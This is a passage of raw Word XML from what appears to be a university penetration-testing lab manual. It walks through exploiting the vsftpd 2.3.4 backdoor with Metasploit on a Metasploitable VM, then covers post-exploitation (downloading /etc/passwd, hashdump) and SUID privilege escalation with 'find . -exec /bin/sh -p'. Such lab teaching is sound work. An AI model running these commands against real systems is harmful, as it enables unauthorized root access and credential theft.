          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a session opens, confirm context: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">download /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where applicable) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find escalation candidates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">□ Illustrative Output (not an actual captured run)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(...) &gt; set RHOSTS 192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 exploit(...) &gt; run</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.56.102:21 - Banner: 220 (vsFTPd 2.3.4)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.56.102:21 - USER: 331 Please specify the password.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] 192.168.56.102:21 - Backdoor service has been spawned, handling...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command shell session 1 opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. The vsftpd 2.3.4 backdoor was introduced maliciously into the source code. What does this tell us about supply chain security?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">It shows that compromise can happen in the distribution channel rather than in the developers' own code — the official source archive on the vendor's server was replaced by attackers for a period in 2011, so anyone who downloaded and compiled it got a backdoor despite auditing the “original” project's source. This is why checksum/signature verification of downloads, and securing software distribution infrastructure, is as important as code review.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. Your Meterpreter/shell runs as the daemon user. Why is it important to escalate to root before post-exploitation?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Many valuable actions — reading /etc/shadow, dumping all credential hashes, installing durable persistence, accessing other users' data — require root privileges. Remaining as daemon limits what can be demonstrated, so privilege escalation (Practical 4) is normally the immediate next step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 4 — Linux Privilege Escalation (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalate from a low-privilege shell to root using SUID binary and sudo misconfiguration techniques.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux to Metasploitable 2 or faculty-provided Ubuntu VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for initial access; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">find</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; GTFOBins (browser reference)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From the foothold gained in Practical 3, drop into a shell: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if in Meterpreter) or use the command-shell session directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check sudo rights: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">List SUID binaries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Look up any interesting binary on GTFOBins for a known escalation technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If an exploitable SUID binary exists (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), run its GTFOBins escalation command (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -exec /bin/sh -p \;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm root: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
